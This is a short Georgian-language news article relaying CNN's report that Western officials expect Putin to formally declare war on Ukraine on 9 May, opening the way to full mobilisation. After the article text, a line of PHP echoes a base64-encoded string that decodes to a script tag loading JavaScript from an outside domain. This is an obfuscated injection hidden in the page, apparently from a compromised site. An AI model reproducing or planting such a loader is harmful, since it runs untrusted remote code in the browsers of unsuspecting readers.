celsiusi
ავერსი შნაიდერი
აშშ-ს და დასავლეთის თანამდებობის პირები ფიქრობენ, რომ ვლადიმერ პუტინი უკრაინას ომს ოფიციალურად 9 მაისს გამოუცხადებს. ეს რუსეთს სარეზერვო ძალების სრული მობილიზაციის გამოცხადების შესაძლებლობას მისცემს. ამის შესახებ ინფორმაციას CNN ავრცელებს.
 
CNN-ის ცნობით, დასავლეთში დიდი ხანია საუბრობენ, რომ პუტინი 9 მაისის სიმბოლურ მნიშვნელობას და პროპაგანდისტულ ღირებულებას გამოიყენებს იმისთვის, რომ ან სამხედრო მიღწევების ან საომარი მოქმედებების ესკალაციის შესახებ გააკეთოს განცხადება – ან ორივეს შესახებ ერთად. საბოლოოდ კი დასავლეთში ერთ შესაძლო სცენარამდე მივიდნენ, რაც 9 მაისს უკრაინაში ომის შესაძლო გამოცხადებას გულისხმობს.
 
ამ დრომდე რუსეთი უკრაინაში შეჭრას არა ომს, არამედ “სპეციალურ სამხედრო ოპერაციას” უწოდებს.
 
CNN განმარტავს, რომ ომის ოფიციალურმა გამოცხადებამ შესაძლოა საზოგადოებაში გააძლიეროს უკრაინაში შეჭრის მხარდამჭერი განწყობები. ასევე, კანონის თანახმად, ეს პუტინს უფლებას მისცემს, რომ გამოაცხადოს სარეზერვო ძალების მობილიზება და გაიწვიოს წვევამდელები.
821
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");